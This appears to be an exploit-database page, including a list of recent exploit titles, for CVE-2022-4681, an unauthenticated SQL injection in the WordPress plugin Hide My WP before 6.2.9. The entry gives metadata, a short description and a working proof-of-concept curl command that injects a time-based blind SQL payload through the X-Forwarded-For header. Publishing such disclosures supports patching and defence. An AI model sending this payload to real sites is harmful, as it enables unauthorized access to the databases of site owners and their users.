60a90afc8d
7 changes to exploits/shellcodes/ghdb Ladder v0.0.21 - Server-side request forgery (SSRF) TP-Link TL-WR740N - Buffer Overflow 'DOS' Numbas < v7.3 - Remote Code Execution Akaunting < 3.1.3 - RCE DataCube3 v1.0 - Unrestricted file upload 'RCE' Hide My WP < 6.2.9 - Unauthenticated SQLi
21 lines
No EOL
779 B
Text
21 lines
No EOL
779 B
Text
# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
|
|
# Publication Date: 2023-01-11
|
|
# Original Researcher: Xenofon Vassilakopoulos
|
|
# Exploit Author: Xenofon Vassilakopoulos
|
|
# Submitter: Xenofon Vassilakopoulos
|
|
# Vendor Homepage: https://wpwave.com/
|
|
# Version: Hide My WP v6.2.8 and prior
|
|
# Tested on: Hide My WP v6.2.7
|
|
# Impact: Database Access
|
|
# CVE: CVE-2022-4681
|
|
# CWE: CWE-89
|
|
# CVSS Score: 8.6 (high)
|
|
|
|
## Description
|
|
|
|
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
|
|
|
|
|
|
## Proof of Concept
|
|
|
|
curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'" |